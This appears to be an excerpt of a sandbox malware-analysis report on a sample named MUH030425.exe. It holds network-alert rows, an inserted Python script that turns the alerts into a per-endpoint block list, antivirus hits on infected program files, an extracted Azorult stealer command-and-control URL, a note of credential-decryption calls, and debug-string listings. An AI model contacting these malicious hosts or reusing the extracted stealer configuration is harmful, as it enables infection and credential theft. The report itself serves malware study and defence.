2025-03-04T09:35:57.030381+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.9 | 49772 | TCP
2025-03-04T09:36:17.244513+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.9 | 49789 | TCP
2025-03-04T09:36:24.491833+0100 | 2037771 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.9 | 49797 | TCP
2025-03-04T09:34:47.102681+0100 | 2029467 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49707 | 104.21.96.1 | 80 | TCP
2025-03-04T09:34:56.050297+0100 | 2029467 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49722 | 104.21.96.1 | 80 | TCP
2025-03-04T09:34:47.102681+0100 | 2810276 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49707 | 104.21.96.1 | 80 | TCP
2025-03-04T09:34:48.183765+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 18.141.10.107 | 80 | TCP
2025-03-04T09:35:54.402772+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49770 | 18.246.231.120 | 80 | TCP
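The alert rows above fire in both directions of the same flow (104.21.96.1 appears as source in one row and destination in three others) and also on DNS queries, where the peer recorded is the resolver 1.1.1.1 rather than anything worth blocking. The following is an added example and not part of the Joe Sandbox report: it folds each alert onto the external endpoint it concerns, keeps the SIDs and classtypes that fired per endpoint, and separates C2-classified peers from the resolver that merely carried the query. The rows are a constructed subset copied from the table above.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    severity: int
    classtype: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


C2_CLASS = "Malware Command and Control Activity Detected"
TROJAN_CLASS = "A Network Trojan was detected"
SANDBOX = "192.168.2.9"
Peer = Tuple[str, int, str]   # (external IP, external port, protocol)

# Constructed subset of the alert table in this report (values copied from it).
ALERTS = [
    Alert("2025-03-04T09:34:47.102681+0100", 2029467, 1, C2_CLASS, SANDBOX, 49707, "104.21.96.1", 80, "TCP"),
    Alert("2025-03-04T09:34:47.102681+0100", 2810276, 1, C2_CLASS, SANDBOX, 49707, "104.21.96.1", 80, "TCP"),
    Alert("2025-03-04T09:34:47.362851+0100", 2029137, 1, C2_CLASS, "104.21.96.1", 80, SANDBOX, 49707, "TCP"),
    Alert("2025-03-04T09:34:56.050297+0100", 2029467, 1, C2_CLASS, SANDBOX, 49722, "104.21.96.1", 80, "TCP"),
    Alert("2025-03-04T09:34:47.944002+0100", 2018141, 1, TROJAN_CLASS, "54.244.188.177", 80, SANDBOX, 49710, "TCP"),
    Alert("2025-03-04T09:34:47.944002+0100", 2037771, 1, TROJAN_CLASS, "54.244.188.177", 80, SANDBOX, 49710, "TCP"),
    Alert("2025-03-04T09:34:48.183765+0100", 2850851, 1, C2_CLASS, SANDBOX, 49709, "18.141.10.107", 80, "TCP"),
    Alert("2025-03-04T09:34:48.219952+0100", 2018141, 1, TROJAN_CLASS, "18.141.10.107", 80, SANDBOX, 49709, "TCP"),
    Alert("2025-03-04T09:34:50.416039+0100", 2051648, 1, TROJAN_CLASS, SANDBOX, 50942, "1.1.1.1", 53, "UDP"),
    Alert("2025-03-04T09:34:52.672541+0100", 2051649, 1, TROJAN_CLASS, SANDBOX, 65066, "1.1.1.1", 53, "UDP"),
    Alert("2025-03-04T09:36:24.491907+0100", 2051651, 1, TROJAN_CLASS, SANDBOX, 64907, "1.1.1.1", 53, "UDP"),
]


def peer_of(a: Alert) -> Peer:
    """Fold both directions of a flow onto its external (non-RFC1918) endpoint."""
    if ipaddress.ip_address(a.src).is_private:
        return (a.dst, a.dport, a.proto)
    return (a.src, a.sport, a.proto)


def summarise(alerts: List[Alert]) -> Dict[Peer, dict]:
    """Per external endpoint: rule SIDs, classtypes, alert count and first/last timestamp."""
    out: Dict[Peer, dict] = {}
    for a in alerts:
        s = out.setdefault(peer_of(a), {"sids": set(), "classtypes": set(), "count": 0,
                                        "first": a.ts, "last": a.ts})
        s["sids"].add(a.sid)
        s["classtypes"].add(a.classtype)
        s["count"] += 1
        s["first"] = min(s["first"], a.ts)   # same UTC offset throughout, so string order is time order
        s["last"] = max(s["last"], a.ts)
    return out


def is_resolver(p: Peer) -> bool:
    """DNS-content rules name the resolver as the peer; the resolver itself is not an indicator."""
    return p[1] == 53 and p[2] == "UDP"


def c2_peers(alerts: List[Alert]) -> Set[str]:
    return {p[0] for p, s in summarise(alerts).items() if C2_CLASS in s["classtypes"]}


def block_list(alerts: List[Alert]) -> List[Peer]:
    """External endpoints worth blocking: everything that alerted except the DNS resolver."""
    return sorted(p for p in summarise(alerts) if not is_resolver(p))


if __name__ == "__main__":
    for peer, s in sorted(summarise(ALERTS).items()):
        tag = "C2" if C2_CLASS in s["classtypes"] else ("resolver" if is_resolver(peer) else "trojan")
        print(f"{peer[0]:>15}:{peer[1]:<3} {peer[2]}  {tag:8} n={s['count']} sids={sorted(s['sids'])} "
              f"{s['first'][11:19]}..{s['last'][11:19]}")
```

The point of the fold is that 104.21.96.1:80 is one endpoint hit by three different rules over two connections, not four separate events, and that 1.1.1.1 drops out of the block list even though it carries three "Network Trojan" alerts; what those DNS rules actually matched on (the queried name) is not in the table and has to come from the DNS log.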


              AV Detection

Source: http://13.251.16.150/lljqple, Avira URL Cloud: Label: malware
Source: http://13.251.16.150/ksbp, Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/gedtsq?usid=18&utid=30152678479, Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/b?usid=18&utid=30152678348, Avira URL Cloud: Label: malware
Source: http://k1d5.icu/TP341/index.php, Avira URL Cloud: Label: malware
Source: http://13.251.16.150/kgihcqktxx, Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/cygwkoswoy?usid=18&utid=30152678086, Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Azorult {"C2 url": "http://k1d5.icu/TP341/index.php"}
Source: MUH030425.exe, Virustotal: Detection: 33%
Source: MUH030425.exe, ReversingLabs: Detection: 28%
Source: Submitted sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 8_2_004094C4 CryptUnprotectData, LocalFree
Source: MUH030425.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MUH030425.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe1.13.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: plugin-container.pdb source: alg.exe, 0000000D.00000003.2202633741.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.13.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pingsender.pdb source: alg.exe, 0000000D.00000003.2182345698.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe1.13.dr
              Source: Binary string: firefox.pdb source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: firefox.pdbP source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: alg.exe, 0000000D.00000003.1947973037.0000000001480000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb.> source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.13.dr
              Source: Binary string: minidump-analyzer.pdb source: alg.exe, 0000000D.00000003.2157918575.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.8.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb4 source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: crashreporter.pdb source: alg.exe, 0000000D.00000003.2059367986.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdb source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: ucrtbase.pdbUGP source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdb source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1781474310.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.13.dr
              Source: Binary string: System.Drawing.pdb( source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000D.00000003.1770420067.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdbp source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbD(L source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
